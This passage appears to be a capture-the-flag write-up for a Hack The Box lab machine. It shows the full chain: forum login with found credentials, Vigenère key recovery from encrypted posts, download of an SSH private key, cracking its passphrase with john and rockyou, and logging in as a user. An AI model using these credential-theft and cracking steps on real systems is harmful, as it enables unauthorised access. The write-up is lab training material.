5 :443 sup3rs3cr3t.brainfuck.htb

# we can login using orestis:kIEnnfEKJ#9UmdO

# 2 new posts
https://sup3rs3cr3t.brainfuck.htb/d/2-ssh-access/4
admin: SSH Access was upgraded to make use of keys. Password login is permanently disabled.
admin:You little shit, still no manners I see... You want me to paste it here for all members to download?
orestis: Go fuck yourself admin, I am locked out!! send me my key asap! Orestis - Hacking for fun and profit
orestis: I am opening up an encrypted thread. Talk to you there! Orestis - Hacking for fun and profit

https://sup3rs3cr3t.brainfuck.htb/d/3-key/5
orestis: Mya qutf de buj otv rms dy srd vkdof :) Pieagnm - Jkoijeg nbw zwx mle grwsnn
admin: Xua zxcbje iai c leer nzgpg ii uy...
orestis: Ufgoqcbje.... Wejmvse - Fbtkqal zqb rso rnl cwihsf
admin: Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec J uovg :) mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr
orestis: Si rbazmvm, Q'yq vtefc gfrkr nn ;) Qbqquzs - Pnhekxs dpi fca fhf zdmgzt

# definitely encrypted, noticing that orestis signs his message everytime with "Orestis - Hacking for fun and profit".
Orestis - Hacking for fun and profit
Pieagnm - Jkoijeg nbw zwx mle grwsnn
Wejmvse - Fbtkqal zqb rso rnl cwihsf
Qbqquzs - Pnhekxs dpi fca fhf zdmgzt

# as the same letter in encrypted is different from each occurence, its not caesar cipher, possibly vigenere

# explanation for encrypted => PT
each PT letter in unicode value - 97 (unicode of 'a') = X
encrypted letter - X = PT letter | D - 2 = B

# automation
plaintext = "OrestisHackingforfunandprofit"
ciphertext = "PieagnmJkoijegnbwzwxmlegrwsnn"
key = ""

for i in range(len(plaintext)):
	num_key = ((ord(ciphertext[i]) - ord(plaintext[i])) % 26) + 97
	char_key = chr(num_key)
	key = key + char_key

print(key)

$ python3 vigenere-exploit.py
brainfuckmybrainfuckmybrainfu

# once we have the key fuckmybrain, using to decde
| https://www.dcode.fr/vigenere-cipher

# PT conversation between orestis <> admin

orestis: Hey give me the url for my key bitch :) Orestis - Hacking for fun and profit
admin: Say please and i just might do so...
orestis: Pleeeease.... Orestis - Hacking for fun and profit
admin :There you go you stupid fuck, I hope you remember your key password because I dont :) https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
orestis: No problem, I'll brute force it ;) Orestis - Hacking for fun and profit

# downloading ssh
$ wget --no-check-certificate https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa

# brute forcing using john
$ /usr/share/john/ssh2john.py id_rsa > ssh.hash

$ john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
Created directory: /home/kashz/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
3poulakia!       (id_rsa)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:01 DONE (2021-10-01 21:24) 0.5494g/s 7880Kp/s 7880Kc/s 7880KC/sa6_123..*7¡Vamos!
Session completed


$ ssh -i id_rsa orestis@10.10.10.17
Enter passphrase for key 'id_rsa':

orestis@brainfuck:~$ whoami;id;hostname
orestis
uid=1000(orestis) gid=1000(orestis) groups=1000(orestis),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare)
brainfuck

Last updated